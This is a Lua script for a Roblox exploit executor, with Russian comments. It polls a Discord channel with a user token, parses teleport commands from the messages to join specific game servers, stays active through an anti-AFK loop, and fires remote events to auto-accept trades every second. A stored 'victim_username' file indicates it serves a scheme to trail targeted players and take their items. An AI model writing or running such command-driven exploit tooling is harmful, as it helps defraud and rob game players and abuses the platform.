if not game:IsLoaded() then
    game.Loaded:Wait()
    print("✅ Игра загружена")
end

-- Проверка токена и ID канала
if token == "" or channelId == "" then
    game.Players.LocalPlayer:Kick("❌ Введи токен и channelId!")
    return
end

-- Anti-AFK
local VirtualUser = game:GetService('VirtualUser')
game:GetService('Players').LocalPlayer.Idled:Connect(function()
    VirtualUser:CaptureController()
    VirtualUser:ClickButton2(Vector2.new())
end)

-- Настройки файлов
local HttpService = game:GetService("HttpService")
if not isfile("user.txt") then writefile("user.txt", "victim_username") end
if not isfile("joined_ids.txt") then writefile("joined_ids.txt", "[]") end

local victimUser = readfile("user.txt")
local joinedIds = HttpService:JSONDecode(readfile("joined_ids.txt"))
local isTeleporting = false

-- Ультра-надёжный парсер
local function findTeleportCommand(content)
    if not content then return nil, nil end
    
    -- Универсальный паттерн для любых вариантов
    local pattern = '[gG]ame%s*[:%.]%s*[gG]et[Ss]ervice%s*%(%s*["\']TeleportService["\']%s*%)%s*:%s*[tT]eleport[tT]o[pP]lace[iI]nstance%s*%(%s*(%d+)%s*,%s*["\']([%w%-]+)["\']'
    
    local placeId, jobId = content:match(pattern)
    return placeId, jobId
end

-- Основная функция
local function checkDiscord()
    local response = request({
        Url = "https://discord.com/api/v9/channels/"..channelId.."/messages?limit=10",
        Method = "GET",
        Headers = {
            ['Authorization'] = token,
            ['Content-Type'] = 'application/json'
        }
    })

    if not response.Success then
        warn("❌ Ошибка Discord:", response.StatusCode)
        return
    end

    local messages = HttpService:JSONDecode(response.Body)
    for _, msg in ipairs(messages) do
        if msg.content then
            print("🔍 Проверяем сообщение:", string.sub(msg.content, 1, 50).."...")
            
            local placeId, jobId = findTeleportCommand(msg.content)
            if placeId and jobId then
                print("🎯 Найдены ID:", placeId, jobId)
                
                if not table.find(joinedIds, msg.id) then
                    table.insert(joinedIds, msg.id)
                    writefile("joined_ids.txt", HttpService:JSONEncode(joinedIds))
                    
                    print("🚀 Телепортируемся...")
                    isTeleporting = true
                    local success = pcall(function()
                        game:GetService("TeleportService"):TeleportToPlaceInstance(tonumber(placeId), jobId)
                    end)
                    
                    if not success then
                        isTeleporting = false
                        warn("❌ Ошибка телепортации")
                    end
                    return
                else
                    print("⚠️ Уже были на этом сервере")
                end
            end
        end
    end
end

-- Автопринятие трейдов
local function autoAcceptTrade()
    while task.wait(1) do
        pcall(function()
            game:GetService("ReplicatedStorage").Trade.AcceptRequest:FireServer()
            game:GetService("ReplicatedStorage").Trade.AcceptTrade:FireServer()
        end)
    end
end

-- Запуск
task.spawn(autoAcceptTrade)

print("✨ Скрипт запущен!")
while task.wait(5) do
    if not isTeleporting then
        pcall(checkDiscord)
    end
end
